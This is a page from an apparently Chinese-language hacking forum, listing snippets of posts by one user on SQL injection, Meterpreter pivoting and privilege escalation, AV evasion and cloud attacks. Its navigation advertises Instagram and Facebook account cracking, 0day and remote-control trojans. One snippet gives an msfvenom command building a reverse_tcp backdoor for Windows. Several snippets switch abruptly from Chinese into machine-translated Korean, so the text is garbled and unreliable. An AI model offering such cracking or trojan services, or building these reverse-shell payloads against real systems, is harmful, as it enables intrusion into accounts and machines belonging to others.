[ HOME ] [
隱私政策 ] [
0day ] [
業務合作 ] [
獲取金幣 ] [
ins破解 ] [
Facebook破解 ] [
faq ] [
联系我们 ] [
遠程控制木馬 ] [
合作方式 ]
用戶:
40393
taibeihacker 的最近動態
-
T别让DeepSeek坑了你!本地部署模型真的安全吗? 1. 前言 Chatgpt가 글로벌 붐을 시작한 이후, DeepSeek (DeepSeek)는 빠르게 증가했으며 또 다른 경이로운 AI 제품이되었습니다. 국내 AI 제품 순위의 최신 통계에 따르면...
-
T0x00 堆叠注入定义 Stacked injections(堆疊注入)從名詞的含義就可以看到應該是一堆sql 語句(多條)一起執行。而在真實的運用中也是這樣的, 我們知道在mysql 中, 主要是命令行中, 每一條語句結尾加...
-
T0x00 SettingContent-ms文件介绍 .SettingContent-ms是在Windows 10中引入的一種文件類型,它的內容是XML格式進行編寫的,主要用於創建Windows設置頁面的快捷方式.Windows...
-
T0x00 前言 問題發生在user.php的的顯示函數,模版變量可控,導致注入,配合注入可達到遠程代碼執行 0x01 漏洞分析 1.SQL注入 先看user.php的$ back_act變量來源於HTTP_REFERER,我們可控。 分配函數用於在模版變量裡賦值...
-
T0x00 BGP(RFC 1771、 RFC 4271)定義全稱是Border Gateway Protocol, 對應中文是邊界網關協議,最新版本是BGPv4。 BGP是互聯網上一個核心的互聯網去中心化自治路由協議。它的地位是核心的毫不誇張地說,...
-
T0x01 meterpreter多级内网代理穿透 1.Pivoting...
-
T利用云提供商漏洞获取初始访问权限 2024 Blackhat Conference의 연구원은 《Kicking in the Door to the Cloud: Exploiting Cloud Provider Vulnerabilities for Initial...
-
TRSAC议题解读-通过影子资源攻击AWS帐户 1. 前言 2024 년 Blackhat Conference에서 3 명의 연구원이 《Breaching-AWS-Accounts-Through-Shadow-Resources》이라는 주제를 공유했습니다. 이...
-
Tdotnet代码审计系列(一) 1. 概述 1.1. 背景 .NET Framework는 주로 Windows 애플리케이션을 빌드하고 실행하는 데 사용되는 Microsoft에서 개발 한 관리 코드 프레임 워크입니다. 수많은 클래스 라이브러리, CLR...
-
T0×01 静态检测与对抗 1.靜態分析原理 簡單的來說,就是通過特徵碼識別靜態文件,殺軟會掃描存在磁盤上的鏡像文件,如果滿足特徵碼,就識別為惡意軟件。 惡意軟件匹配規則yara匹配惡意軟件的時候就是用的這樣的方式。...
-
TKubernetes Pod 横向移动 1 前言 本文討論了滲透測試場景下,當攻擊者在Kubernetes 集群中擁有創建pods 權限時,由於配置不當造成集群接管的風險。提出在不同配置下,通過pods 橫向移動並最終接管集群的不同方案。 2 摘要...
-
TRSAC议题解读-云上跨租户漏洞攻击面分析 2023 年的RSAC 會議上兩位來自Wiz 的安全研究員,分享了名為《Tackling the Recent Rise of Cross-Tenant Vulnerabilities》...
-
TOAuth 2.0协议及漏洞 1 OAuth 2.0 协议简介 OAuth 2.0 是一種授權機制,常用來授權第三方應用登錄。數據的所有者告訴系統,同意授權第三方應用獲取用戶的數據。系統從而產生一個短期的進入令牌(token),用來代替密碼,供第三方應用使用。...
-
TvCenter 漏洞利用 1 vSphere 背景介绍 vSphere,ESXi 和vCenter 辨析: VMware Inc **VMware Inc ** 是一家軟件公司。它開發了許多產品,尤其是各種雲解決方案。它的雲解決方案包括雲產品,數據中心產品和桌面產品等。...
-
T0x01 Meterpreter自动提权 1.生成后门程序 我們在kali的命令行下直接執行以下命令獲得一個針對windows的反彈型木馬: msfvenom -p windows/meterpreter/reverse_tcp lhost=172.16.11.2...